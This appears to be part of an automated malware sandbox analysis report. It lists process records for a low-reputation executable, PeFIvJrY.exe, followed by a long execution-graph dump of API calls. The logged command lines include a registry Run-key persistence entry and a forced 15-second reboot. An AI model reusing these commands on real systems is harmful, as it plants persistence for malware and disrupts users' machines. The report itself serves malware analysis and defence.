                              Commandline:reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe"
                              Imagebase:0x810000
                              File size:59'392 bytes
                              MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:7
                              Start time:08:16:53
                              Start date:02/08/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:9
                              Start time:08:16:55
                              Start date:02/08/2024
                              Path:C:\Windows\SysWOW64\shutdown.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\SysWOW64\shutdown.exe" /r /f /t 15
                              Imagebase:0x410000
                              File size:23'552 bytes
                              MD5 hash:FCDE5AF99B82AE6137FB90C7571D40C3
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              Target ID:10
                              Start time:08:16:55
                              Start date:02/08/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:12
                              Start time:08:17:05
                              Start date:02/08/2024
                              Path:C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe"
                              Imagebase:0x3e0000
                              File size:358'000 bytes
                              MD5 hash:65CD1FFDB524F091FC06884DCB1270F9
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:false

                              Target ID:13
                              Start time:08:17:14
                              Start date:02/08/2024
                              Path:C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe"
                              Imagebase:0x3e0000
                              File size:358'000 bytes
                              MD5 hash:65CD1FFDB524F091FC06884DCB1270F9
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:true

                                Execution Graph

                                Execution Coverage:6.4%
                                Dynamic/Decrypted Code Coverage:12.3%
                                Signature Coverage:8.4%
                                Total number of Nodes:1362
                                Total number of Limit Nodes:27
61445 42de41 61444->61445 61446 42de2d 61444->61446 61467 42ddd0 61445->61467 61476 42da48 14 API calls __dosmaperr 61446->61476 61450 42de32 61477 42919f 183 API calls ___std_exception_copy 61450->61477 61451 42de56 CreateThread 61453 42de75 GetLastError 61451->61453 61454 42de81 61451->61454 61503 42dcc4 61451->61503 61478 42d9ee 14 API calls __dosmaperr 61453->61478 61479 42dd42 61454->61479 61455 42de3d 61455->60936 61464 42450e 61461->61464 61462 4244ea RtlInitializeConditionVariable 61462->61443 61463 4244cc InitializeCriticalSectionEx 61463->61443 61464->61462 61464->61463 61487 431398 61467->61487 61472 42de12 61474 42dd42 16 API calls 61472->61474 61473 42ddf5 GetModuleHandleExW 61473->61472 61475 42de1a 61474->61475 61475->61451 61475->61454 61476->61450 61477->61455 61478->61454 61480 42dd72 61479->61480 61481 42dd4e 61479->61481 61480->60936 61482 42dd54 CloseHandle 61481->61482 61483 42dd5d 61481->61483 61482->61483 61484 42dd63 FreeLibrary 61483->61484 61485 42dd6c 61483->61485 61484->61485 61486 430201 ___free_lconv_mon 14 API calls 61485->61486 61486->61480 61492 4313a5 __dosmaperr 61487->61492 61488 4313e5 61501 42da48 14 API calls __dosmaperr 61488->61501 61489 4313d0 RtlAllocateHeap 61490 42dde1 61489->61490 61489->61492 61494 430201 61490->61494 61492->61488 61492->61489 61500 42e093 RtlEnterCriticalSection RtlLeaveCriticalSection __dosmaperr 61492->61500 61495 43020c HeapFree 61494->61495 61499 42ddee 61494->61499 61496 430221 GetLastError 61495->61496 61495->61499 61497 43022e __dosmaperr 61496->61497 61502 42da48 14 API calls __dosmaperr 61497->61502 61499->61472 61499->61473 61500->61492 61501->61490 61502->61499 61504 42dcd0 ___scrt_is_nonwritable_in_current_image 61503->61504 61505 42dcd7 GetLastError RtlExitUserThread 61504->61505 61506 42dce4 61504->61506 61505->61506 61519 42ff16 GetLastError 61506->61519 61512 42dd00 61551 3f9ea0 61512->61551 61513 42dd1c 61557 42dea3 17 API calls 61513->61557 61520 42ff32 61519->61520 61521 42ff2c 
61519->61521 61544 42ff36 SetLastError 61520->61544 61559 4316b4 6 API calls __dosmaperr 61520->61559 61558 431675 6 API calls __dosmaperr 61521->61558 61524 42ff4e 61525 431398 __dosmaperr 14 API calls 61524->61525 61524->61544 61527 42ff63 61525->61527 61530 42ff6b 61527->61530 61531 42ff7c 61527->61531 61528 42dce9 61546 431882 61528->61546 61529 42ffcb 61564 42e422 183 API calls IsInExceptionSpec 61529->61564 61560 4316b4 6 API calls __dosmaperr 61530->61560 61561 4316b4 6 API calls __dosmaperr 61531->61561 61536 42ff79 61541 430201 ___free_lconv_mon 14 API calls 61536->61541 61537 42ff88 61538 42ffa3 61537->61538 61539 42ff8c 61537->61539 61563 42fd44 14 API calls __dosmaperr 61538->61563 61562 4316b4 6 API calls __dosmaperr 61539->61562 61541->61544 61543 42ffae 61545 430201 ___free_lconv_mon 14 API calls 61543->61545 61544->61528 61544->61529 61545->61544 61547 42dcf4 61546->61547 61548 431894 GetPEB 61546->61548 61547->61512 61556 4317cf 5 API calls __dosmaperr 61547->61556 61548->61547 61549 4318a7 61548->61549 61565 4315b7 5 API calls __dosmaperr 61549->61565 61566 3e89a0 61551->61566 61555 3f9eb3 _Ref_count_obj 61555->61513 61556->61512 61558->61520 61559->61524 61560->61536 61561->61537 61562->61536 61563->61543 61565->61547 61619 42deb1 61566->61619 61569 3e8a2c GetCurrentThread SetThreadPriority 61571 3e8a4c 61569->61571 61572 3e8a40 61569->61572 61570 3e8a19 GetCurrentThread SetThreadDescription 61570->61569 61574 3f5300 191 API calls 61571->61574 61573 3ee7b0 239 API calls 61572->61573 61573->61571 61575 3e8a5a 61574->61575 61576 3ffe90 3 API calls 61575->61576 61617 3e8a86 __Mtx_unlock 61576->61617 61577 3e8c2d 61578 3ee7b0 239 API calls 61577->61578 61587 3e8c45 61577->61587 61578->61587 61579 3e8f97 61584 3e8fac 61579->61584 61588 3ee7b0 239 API calls 61579->61588 61580 3e8cb3 61586 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 61580->61586 61581 3e8ca9 GetCurrentThreadId 61581->61580 
61582 424cbf RtlAcquireSRWLockExclusive 61582->61617 61583 3ffe90 QueryUnbiasedInterruptTimePrecise QueryUnbiasedInterruptTime QueryInterruptTime 61583->61617 61654 424cbf RtlAcquireSRWLockExclusive 61584->61654 61590 3e8cd6 61586->61590 61591 3ee7b0 239 API calls 61587->61591 61593 3e8c73 61587->61593 61588->61584 61589 3e8fba 61655 424cdb RtlReleaseSRWLockExclusive 61589->61655 61618 424822 GetCurrentThreadId RtlEnterCriticalSection RtlLeaveCriticalSection __Mtx_unlock __Cnd_broadcast 61590->61618 61591->61593 61593->61580 61593->61581 61594 3ee7b0 239 API calls 61594->61617 61602 3e90d2 61659 424c11 188 API calls IsInExceptionSpec 61602->61659 61603 3e8fcc 61603->61577 61656 3e7740 197 API calls 61603->61656 61657 3f4cb0 196 API calls 61603->61657 61604 3e90c8 61658 3e7260 187 API calls 2 library calls 61604->61658 61608 3e90a7 61609 3e8c25 61608->61609 61612 3ee7b0 239 API calls 61608->61612 61650 424cdb RtlReleaseSRWLockExclusive 61609->61650 61612->61609 61613 3f86e0 199 API calls 61613->61617 61615 424cdb RtlReleaseSRWLockExclusive 61615->61617 61616 3fa080 197 API calls 61616->61617 61617->61577 61617->61579 61617->61582 61617->61583 61617->61594 61617->61602 61617->61604 61617->61608 61617->61613 61617->61615 61617->61616 61622 3e90e0 61617->61622 61647 3f6990 7 API calls 3 library calls 61617->61647 61648 3f8b20 201 API calls 4 library calls 61617->61648 61649 3e9660 271 API calls 3 library calls 61617->61649 61651 4247d2 13 API calls 61617->61651 61652 42397a GetCurrentThreadId do_wait 61617->61652 61653 3f6af0 199 API calls 2 library calls 61617->61653 61618->61555 61620 42ff16 _unexpected 183 API calls 61619->61620 61621 3e89fb 61620->61621 61621->61569 61621->61570 61623 3e9132 61622->61623 61624 3e913e 61622->61624 61625 3ee7b0 239 API calls 61623->61625 61626 3e92a3 61624->61626 61627 3e91b4 61624->61627 61625->61624 61629 400320 203 API calls 61626->61629 61628 3e91c9 61627->61628 61630 3ee7b0 239 API calls 61627->61630 61632 42571f 185 API calls 
61628->61632 61631 3e92d0 61629->61631 61630->61628 61660 3f6aa0 61631->61660 61634 3e91fa 61632->61634 61637 3e9264 61634->61637 61638 3e9330 61634->61638 61636 3e22e0 183 API calls 61636->61637 61641 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 61637->61641 61639 400320 203 API calls 61638->61639 61640 3e9341 61639->61640 61643 4016f0 244 API calls 61640->61643 61642 3e929a 61641->61642 61642->61617 61644 3e93a2 61643->61644 61645 3e22e0 183 API calls 61644->61645 61646 3e93b0 61645->61646 61646->61646 61647->61617 61648->61617 61649->61617 61650->61577 61651->61617 61652->61617 61653->61617 61654->61589 61655->61603 61656->61603 61657->61603 61658->61602 61661 3f6ab5 61660->61661 61662 4016f0 244 API calls 61661->61662 61663 3e931d 61662->61663 61663->61636 61665 40911b 61664->61665 61684 3ee7e6 61664->61684 61666 425d49 6 API calls 61665->61666 61667 409125 61666->61667 61667->61684 61690 3ee6c0 61667->61690 61673 40916e 61676 409189 61673->61676 61738 409610 61673->61738 61675 40917c 61778 4263fd 14 API calls 61675->61778 61680 40920d 61676->61680 61681 4091b8 _Ref_count_obj 61676->61681 61678 4091cc 61780 425cff RtlEnterCriticalSection RtlLeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 61678->61780 61683 4291af 183 API calls 61680->61683 61779 42598b 186 API calls 61681->61779 61685 409212 61683->61685 61684->60867 61686 409220 61684->61686 61687 40924c 61686->61687 61812 40a810 61687->61812 61691 3e21d0 185 API calls 61690->61691 61692 3ee737 61691->61692 61693 4092d0 61692->61693 61781 42640f 61693->61781 61695 409315 IsInExceptionSpec 61696 42571f 185 API calls 61695->61696 61697 409158 61695->61697 61696->61697 61698 408f50 61697->61698 61699 408fc0 61698->61699 61711 409013 61698->61711 61700 4092d0 185 API calls 61699->61700 61704 408fc8 61700->61704 61701 40903c 61702 409042 61701->61702 61703 40908c 61701->61703 61710 425711 
__ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 61702->61710 61706 400460 190 API calls 61703->61706 61705 409610 209 API calls 61704->61705 61704->61711 61707 409006 61705->61707 61709 40909a 61706->61709 61798 4263fd 14 API calls 61707->61798 61713 3e7230 185 API calls 61709->61713 61712 409083 61710->61712 61737 409610 209 API calls 61711->61737 61712->61673 61714 4090bf 61713->61714 61715 427210 Concurrency::cancel_current_task RaiseException 61714->61715 61716 4090cd 61715->61716 61717 4091d9 61716->61717 61718 425d49 6 API calls 61716->61718 61717->61673 61719 409125 61718->61719 61719->61717 61720 3ee6c0 185 API calls 61719->61720 61721 40914b 61720->61721 61722 4092d0 185 API calls 61721->61722 61723 409158 61722->61723 61724 408f50 224 API calls 61723->61724 61725 40916e 61724->61725 61726 409189 61725->61726 61727 409610 209 API calls 61725->61727 61728 4091b8 _Ref_count_obj 61726->61728 61733 40920d 61726->61733 61729 40917c 61727->61729 61800 42598b 186 API calls 61728->61800 61799 4263fd 14 API calls 61729->61799 61731 4091cc 61801 425cff RtlEnterCriticalSection RtlLeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 61731->61801 61735 4291af 183 API calls 61733->61735 61736 409212 61735->61736 61737->61701 61740 409627 _Ref_count_obj 61738->61740 61739 4291af 183 API calls 61744 4098a6 61739->61744 61740->61739 61741 40987d _Ref_count_obj 61740->61741 61741->61675 61742 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 61743 409dd4 61742->61743 61743->61675 61745 40999f 61744->61745 61747 3e21d0 185 API calls 61744->61747 61777 409a13 _Ref_count_obj 61744->61777 61802 400b90 61745->61802 61747->61745 61748 4099b4 61806 40afa0 61748->61806 61750 4099c6 61751 4099f0 _Ref_count_obj 61750->61751 61753 409ddd 61750->61753 61752 3fd2a0 191 API calls 61751->61752 61756 409a04 61752->61756 61754 4291af 183 API calls 61753->61754 61755 
409df6 61754->61755 61757 3e21d0 185 API calls 61756->61757 61756->61777 61758 409a8b 61757->61758 61759 409aac _Ref_count_obj 61758->61759 61760 3e21d0 185 API calls 61758->61760 61761 400b90 185 API calls 61759->61761 61760->61759 61762 409aff 61761->61762 61763 40afa0 183 API calls 61762->61763 61765 409b0b _Ref_count_obj 61763->61765 61764 3e8200 209 API calls 61766 409b51 61764->61766 61765->61764 61767 409b6a 61766->61767 61768 409b5d 61766->61768 61769 3e21d0 185 API calls 61767->61769 61770 3f5580 183 API calls 61768->61770 61771 409b92 61769->61771 61773 409b68 _Ref_count_obj 61770->61773 61772 3f5580 183 API calls 61771->61772 61772->61773 61774 400b90 185 API calls 61773->61774 61775 409c49 61774->61775 61776 40afa0 183 API calls 61775->61776 61776->61777 61777->61742 61778->61676 61779->61678 61780->61684 61784 426414 61781->61784 61783 426432 61783->61695 61784->61783 61786 426434 61784->61786 61796 42e093 RtlEnterCriticalSection RtlLeaveCriticalSection __dosmaperr 61784->61796 61797 42f9cb 184 API calls 3 library calls 61784->61797 61787 42643e 61786->61787 61788 3e2090 Concurrency::cancel_current_task 61786->61788 61790 427210 Concurrency::cancel_current_task RaiseException 61787->61790 61789 427210 Concurrency::cancel_current_task RaiseException 61788->61789 61791 3e20ac 61789->61791 61792 4265f1 61790->61792 61795 426fbb 184 API calls 3 library calls 61791->61795 61794 3e20d3 61794->61695 61795->61794 61796->61784 61797->61784 61798->61711 61799->61726 61800->61731 61801->61717 61803 400c12 61802->61803 61805 400c09 IsInExceptionSpec 61802->61805 61803->61805 61811 400830 185 API calls 4 library calls 61803->61811 61805->61748 61807 40afcd 61806->61807 61808 40aff0 _Ref_count_obj 61806->61808 61807->61808 61809 4291af 183 API calls 61807->61809 61808->61750 61810 40b04a 61809->61810 61811->61805 61815 40ad20 61812->61815 61816 40af3b 61815->61816 61817 40ad8b GetLastError 61815->61817 61819 425711 
__ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 61816->61819 61818 40af6c 61817->61818 61822 40adb8 61817->61822 61840 40a000 61818->61840 61821 409250 61819->61821 61821->60867 61824 40ae11 61822->61824 61826 40adde SwitchToThread 61822->61826 61860 424cbf RtlAcquireSRWLockExclusive 61822->61860 61867 424cdb RtlReleaseSRWLockExclusive 61822->61867 61861 3f9e40 188 API calls 61824->61861 61826->61822 61828 40ae33 61862 400000 187 API calls 61828->61862 61830 40ae5b 61832 40ae78 61830->61832 61863 40a940 5 API calls 2 library calls 61830->61863 61864 424cbf RtlAcquireSRWLockExclusive 61832->61864 61834 40aec3 61836 40aed2 61834->61836 61865 40a9c0 197 API calls 4 library calls 61834->61865 61837 40aefd SetLastError 61836->61837 61866 424cdb RtlReleaseSRWLockExclusive 61836->61866 61837->61816 61839 40aefa 61839->61837 61868 424cbf RtlAcquireSRWLockExclusive 61840->61868 61842 40a03c 61843 40a05a GetModuleHandleW 61842->61843 61854 40a146 61842->61854 61869 424cf7 GetNativeSystemInfo 61843->61869 61846 40a160 61848 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 61846->61848 61847 40a088 61850 42571f 185 API calls 61847->61850 61849 40a17b 61848->61849 61849->61822 61851 40a0a7 61850->61851 61852 40a0f2 61851->61852 61853 40a17f 61851->61853 61858 40a0fa 61851->61858 61870 40a860 185 API calls 3 library calls 61852->61870 61873 3f43e0 185 API calls 61853->61873 61872 424cdb RtlReleaseSRWLockExclusive 61854->61872 61858->61854 61871 40a9c0 197 API calls 4 library calls 61858->61871 61860->61822 61861->61828 61862->61830 61863->61832 61864->61834 61865->61836 61866->61839 61867->61822 61868->61842 61869->61847 61870->61858 61871->61858 61872->61846 61874->60877 60609 258d01c 60610 258d030 60609->60610 60611 258d070 60610->60611 60614 25b0839 60610->60614 60621 25b0848 60610->60621 60616 25b084d 60614->60616 60615 25b0990 60617 25b0996 60615->60617 60632 
632a128 60615->60632 60636 632a11a 60615->60636 60616->60615 60628 25b6eb0 60616->60628 60617->60611 60624 25b084d 60621->60624 60622 25b0990 60623 25b0996 60622->60623 60626 632a11a 6 API calls 60622->60626 60627 632a128 6 API calls 60622->60627 60623->60611 60624->60622 60625 25b6eb0 CreateActCtxA 60624->60625 60625->60624 60626->60623 60627->60623 60640 25b6ed0 60628->60640 60644 25b6ee0 60628->60644 60633 632a137 60632->60633 60652 63293ac 60633->60652 60637 632a128 60636->60637 60638 63293ac 6 API calls 60637->60638 60639 632a158 60638->60639 60639->60617 60642 25b6ed7 60640->60642 60641 25b6fe4 60641->60641 60642->60641 60648 25b6984 60642->60648 60646 25b6f07 60644->60646 60645 25b6fe4 60645->60645 60646->60645 60647 25b6984 CreateActCtxA 60646->60647 60647->60645 60649 25b7f70 CreateActCtxA 60648->60649 60651 25b8033 60649->60651 60654 63293b7 60652->60654 60656 63294f4 60654->60656 60655 632aa55 60655->60655 60658 63294ff 60656->60658 60657 632b71f 60657->60655 60658->60657 60659 632b6c4 60658->60659 60663 632cf48 60658->60663 60659->60657 60668 6307d67 60659->60668 60673 6307d78 60659->60673 60664 632cf69 60663->60664 60665 632cf8d 60664->60665 60678 632d0f0 60664->60678 60682 632d0f8 60664->60682 60665->60659 60671 6307ddd 60668->60671 60669 6308240 WaitMessage 60669->60671 60671->60669 60672 6307e2a 60671->60672 60734 6306d74 60671->60734 60672->60657 60675 6307ddd 60673->60675 60674 6307e2a 60674->60657 60675->60674 60676 6308240 WaitMessage 60675->60676 60677 6306d74 DispatchMessageW 60675->60677 60676->60675 60677->60675 60679 632d0f8 60678->60679 60680 632d13e 60679->60680 60686 632b2f4 60679->60686 60680->60665 60683 632d105 60682->60683 60684 632d13e 60683->60684 60685 632b2f4 3 API calls 60683->60685 60684->60665 60685->60684 60687 632b2ff 60686->60687 60689 632d1b0 60687->60689 60690 632b328 60687->60690 60689->60689 60691 632b333 60690->60691 60697 632b338 60691->60697 60693 632d21e 60701 6300a78 60693->60701 60710 6300a90 60693->60710 60694 
632d259 60694->60689 60700 632b343 60697->60700 60698 632e239 60698->60693 60699 632cf48 3 API calls 60699->60698 60700->60698 60700->60699 60703 6300ac1 60701->60703 60704 6300bc0 60701->60704 60702 6300acd 60702->60694 60703->60702 60719 6300cf8 60703->60719 60723 6300d08 60703->60723 60704->60694 60705 6300b0c 60726 6302008 60705->60726 60730 6301ffa 60705->60730 60712 6300ac1 60710->60712 60713 6300bc0 60710->60713 60711 6300acd 60711->60694 60712->60711 60717 6300cf8 2 API calls 60712->60717 60718 6300d08 2 API calls 60712->60718 60713->60694 60714 6300b0c 60715 6302008 CreateWindowExW 60714->60715 60716 6301ffa CreateWindowExW 60714->60716 60715->60713 60716->60713 60717->60714 60718->60714 60720 6300cfd 60719->60720 60722 6300d51 LoadLibraryExW GetModuleHandleW 60720->60722 60721 6300d12 60721->60705 60722->60721 60724 6300d12 60723->60724 60725 6300d51 LoadLibraryExW GetModuleHandleW 60723->60725 60724->60705 60725->60724 60727 6302033 60726->60727 60728 63020e2 60727->60728 60729 6302e91 CreateWindowExW 60727->60729 60729->60728 60731 6302008 60730->60731 60732 63020e2 60731->60732 60733 6302e91 CreateWindowExW 60731->60733 60733->60732 60735 6308ee8 DispatchMessageW 60734->60735 60736 6308f54 60735->60736 60736->60671 60737 258d0dc 60738 258d0f4 60737->60738 60739 258d14e 60738->60739 60744 63030e8 60738->60744 60748 63002ec 60738->60748 60757 6303e39 60738->60757 60766 63030d8 60738->60766 60745 630310e 60744->60745 60746 63002ec CallWindowProcW 60745->60746 60747 630312f 60746->60747 60747->60739 60749 63002f7 60748->60749 60750 6303ea9 60749->60750 60752 6303e99 60749->60752 60783 6300414 60750->60783 60770 63044a4 60752->60770 60775 63043d8 60752->60775 60779 63043c8 60752->60779 60753 6303ea7 60760 6303e75 60757->60760 60758 6303ea9 60759 6300414 CallWindowProcW 60758->60759 60762 6303ea7 60759->60762 60760->60758 60761 6303e99 60760->60761 60763 63044a4 CallWindowProcW 60761->60763 60764 63043d8 CallWindowProcW 60761->60764 60765 63043c8 
CallWindowProcW 60761->60765 60763->60762 60764->60762 60765->60762 60767 63030e8 60766->60767 60768 63002ec CallWindowProcW 60767->60768 60769 630312f 60768->60769 60769->60739 60771 6304462 60770->60771 60772 63044b2 60770->60772 60787 6304490 60771->60787 60773 6304478 60773->60753 60777 63043ec 60775->60777 60776 6304478 60776->60753 60778 6304490 CallWindowProcW 60777->60778 60778->60776 60781 63043d8 60779->60781 60780 6304478 60780->60753 60782 6304490 CallWindowProcW 60781->60782 60782->60780 60784 630041f 60783->60784 60785 630571a CallWindowProcW 60784->60785 60786 63056c9 60784->60786 60785->60786 60786->60753 60788 63044a1 60787->60788 60790 6305651 60787->60790 60788->60773 60791 6300414 CallWindowProcW 60790->60791 60792 630566a 60791->60792 60792->60788 60793 632a1b8 60794 632a1fe GetCurrentProcess 60793->60794 60796 632a250 GetCurrentThread 60794->60796 60799 632a249 60794->60799 60797 632a286 60796->60797 60798 632a28d GetCurrentProcess 60796->60798 60797->60798 60802 632a2c3 60798->60802 60799->60796 60800 632a2eb GetCurrentThreadId 60801 632a31c 60800->60801 60802->60800 62038 425f39 62039 425f45 ___scrt_is_nonwritable_in_current_image 62038->62039 62068 4257c5 62039->62068 62041 425f4c 62042 42609f 62041->62042 62049 425f76 62041->62049 62102 426602 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter IsInExceptionSpec 62042->62102 62044 4260a6 62103 42ed52 169 API calls IsInExceptionSpec 62044->62103 62046 425fb5 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 62055 426016 62046->62055 62098 42ded1 183 API calls 4 library calls 62046->62098 62047 4260ac 62104 42ed16 169 API calls IsInExceptionSpec 62047->62104 62049->62046 62051 425f95 62049->62051 62079 42f813 62049->62079 62050 4260b4 62105 426892 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 62050->62105 62054 4260ba __scrt_common_main_seh 62083 42671d 62055->62083 62057 
42601c 62087 3fa810 62057->62087 62062 426038 62062->62044 62063 42603c 62062->62063 62064 426045 62063->62064 62100 42ed07 169 API calls IsInExceptionSpec 62063->62100 62101 425936 219 API calls ___scrt_uninitialize_crt 62064->62101 62067 42604d 62067->62051 62069 4257ce 62068->62069 62106 42622c IsProcessorFeaturePresent 62069->62106 62071 4257da 62107 427b0a 10 API calls 2 library calls 62071->62107 62073 4257df 62074 4257e3 62073->62074 62108 42f704 62073->62108 62074->62041 62077 4257fa 62077->62041 62080 42f821 62079->62080 62081 42f83a 62079->62081 62080->62081 62157 4041d0 IsProcessorFeaturePresent 62080->62157 62081->62046 62084 4279a0 IsInExceptionSpec 62083->62084 62085 426730 GetStartupInfoW 62084->62085 62086 426743 62085->62086 62086->62057 62226 4230c0 GetModuleHandleW 62087->62226 62089 3fa86a 62094 42571f 185 API calls 62089->62094 62090 3fa839 62090->62089 62091 3fa852 62090->62091 62092 3ee7b0 239 API calls 62090->62092 62091->62089 62093 3ee7b0 239 API calls 62091->62093 62092->62091 62093->62089 62095 3fa874 62094->62095 62096 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 62095->62096 62097 3fa91b 62096->62097 62099 426753 GetModuleHandleW 62097->62099 62098->62055 62099->62062 62100->62064 62101->62067 62102->62044 62103->62047 62104->62050 62105->62054 62106->62071 62107->62073 62112 433c65 62108->62112 62111 427b29 7 API calls 2 library calls 62111->62074 62113 433c75 62112->62113 62114 4257ec 62112->62114 62113->62114 62116 4312ce 62113->62116 62114->62077 62114->62111 62117 4312da ___scrt_is_nonwritable_in_current_image 62116->62117 62128 42e881 RtlEnterCriticalSection 62117->62128 62119 4312e1 62129 433dae 62119->62129 62124 4312fa 62143 43121e GetStdHandle GetFileType 62124->62143 62125 431310 62125->62113 62127 4312ff 62144 431325 RtlLeaveCriticalSection IsInExceptionSpec 62127->62144 62128->62119 62130 433dba ___scrt_is_nonwritable_in_current_image 62129->62130 62131 433dc3 
62130->62131 62132 433de4 62130->62132 62153 42da48 14 API calls __dosmaperr 62131->62153 62145 42e881 RtlEnterCriticalSection 62132->62145 62135 433dc8 62154 42919f 183 API calls ___std_exception_copy 62135->62154 62137 4312f0 62137->62127 62142 431168 186 API calls 62137->62142 62138 433e1c 62155 433e43 RtlLeaveCriticalSection IsInExceptionSpec 62138->62155 62139 433df0 62139->62138 62146 433cfe 62139->62146 62142->62124 62143->62127 62144->62125 62145->62139 62147 431398 __dosmaperr 14 API calls 62146->62147 62149 433d10 62147->62149 62148 433d1d 62150 430201 ___free_lconv_mon 14 API calls 62148->62150 62149->62148 62156 4316f6 6 API calls __dosmaperr 62149->62156 62152 433d72 62150->62152 62152->62139 62153->62135 62154->62137 62155->62137 62156->62149 62158 40421d 62157->62158 62179 404440 62158->62179 62161 404440 VirtualQuery 62162 4042e4 62161->62162 62182 408840 GetModuleHandleW 62162->62182 62164 4042e9 62165 404440 VirtualQuery 62164->62165 62166 4042ee 62165->62166 62187 402690 GetNativeSystemInfo GetLargePageMinimum GetModuleHandleW 62166->62187 62169 40433c 62170 404440 VirtualQuery 62169->62170 62171 404341 62170->62171 62203 4070b0 GetCurrentProcess IsWow64Process 62171->62203 62172 40433a VirtualProtect 62172->62169 62174 404346 std::_Rethrow_future_exception 62174->62174 62175 404440 VirtualQuery 62174->62175 62176 40440d 62175->62176 62177 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 62176->62177 62178 404424 62177->62178 62178->62080 62180 40422b 62179->62180 62181 40444c VirtualQuery 62179->62181 62180->62161 62181->62180 62183 408855 GetLastError 62182->62183 62184 40885f 62182->62184 62183->62164 62222 408870 29 API calls __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 62184->62222 62186 408869 62186->62164 62188 402ac9 62187->62188 62189 402c2f GetLastError 62187->62189 62223 402c60 75 API calls 
__ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 62188->62223 62190 402ba4 GetModuleHandleW 62189->62190 62193 402bb7 62190->62193 62194 402c3a GetLastError 62190->62194 62192 402b9e 62192->62190 62224 403b80 21 API calls __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 62193->62224 62195 402bee GetModuleHandleW 62194->62195 62198 402c42 GetLastError 62195->62198 62199 402bfd 62195->62199 62197 402beb 62197->62195 62200 402c19 62198->62200 62225 403f10 13 API calls __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 62199->62225 62200->62169 62200->62172 62202 402c16 62202->62200 62204 4070f4 GetCurrentProcess IsWow64Process2 62203->62204 62205 40721a GetLastError 62203->62205 62207 40723d GetLastError 62204->62207 62208 407141 CreateFileW 62204->62208 62205->62207 62207->62208 62210 4071d1 62208->62210 62211 4071af GetFinalPathNameByHandleW 62208->62211 62214 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 62210->62214 62212 4071e5 62211->62212 62213 4071c6 62211->62213 62212->62213 62217 4071ec 62212->62217 62213->62210 62215 4071ca CloseHandle 62213->62215 62216 4071de 62214->62216 62215->62210 62216->62174 62218 407206 62217->62218 62219 4071ff CloseHandle 62217->62219 62220 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 62218->62220 62219->62218 62221 407213 62220->62221 62221->62174 62222->62186 62223->62192 62224->62197 62225->62202 62227 4230d0 GetProcAddress 62226->62227 62228 4230f9 62226->62228 62227->62228 62229 4230e2 62227->62229 62228->62090 62229->62090 62230 3f0140 62231 3f0193 62230->62231 62232 3f0310 62230->62232 62234 3f02ca 62231->62234 62235 3f0199 62231->62235 62233 3f028f NtdllDefWindowProc_W 62232->62233 62236 3f032d 62232->62236 62237 3f05ed 62232->62237 62238 3f066a 62232->62238 62239 3f03d9 62232->62239 
